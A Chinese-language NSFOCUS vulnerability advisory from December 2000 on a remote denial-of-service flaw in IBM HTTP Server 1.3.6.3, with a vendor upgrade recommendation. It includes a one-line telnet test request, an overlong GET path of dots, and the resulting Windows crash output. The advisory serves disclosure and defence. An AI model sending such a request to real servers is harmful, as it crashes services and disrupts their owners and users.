首页 -> 安全研究
安全研究
绿盟月刊
绿盟安全月刊->第16期->最新漏洞
日期:2000-12-14
受影响的系统:
IBM HTTP Server 1.3.6.3
- Solaris 2.x
- Linux
- IBM AIX
- Windows NT
不受影响系统:
IBM HTTP Server 1.3.12
- Solaris 2.x
- Linux
- IBM AIX
- Windows NT
描述:
--------------------------------------------------------------------------------
IBM HTTP Server 是一个IBM提供的Web Server.它存在一个远程拒绝服务攻击漏洞。如果
提交一个很长的(超过219字符)GET请求,将导致IBM HTTP Server停止响应,必须重新启动
此应用程序才可以恢复正常工作。攻击者可能利用此漏洞远程执行任意命令,但是目前仍
未经验证。
<*来源: benjurry (benjurry@yeah.net) *>
测试程序:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
benjurry (benjurry@yeah.net)提供了下列测试代码:
(目标主机运行在Windows 2000下。)
$ telnet target 80
GET /......(216个".")aaa HTTP/1.0
则系统会报告下列错误信息:
***STOP:0x0000001e(0X00000005,0X804B3A51,0X00000000,0X00000000)KMODE_EXCEPTI
ON_NOT_HANDLED.
***Address 804B3A51 base at 80400000,Datastamp 384D9B17-ntoskrnl.exe
--------------------------------------------------------------------------------
建议:
厂商补丁:
IBM已经在1.3.12版本中解决了此问题,NSFOCUS建议您立刻升级到最新版本:
http://www-4.ibm.com/software/webservers/httpservers/download.html
版权所有,未经许可,不得转载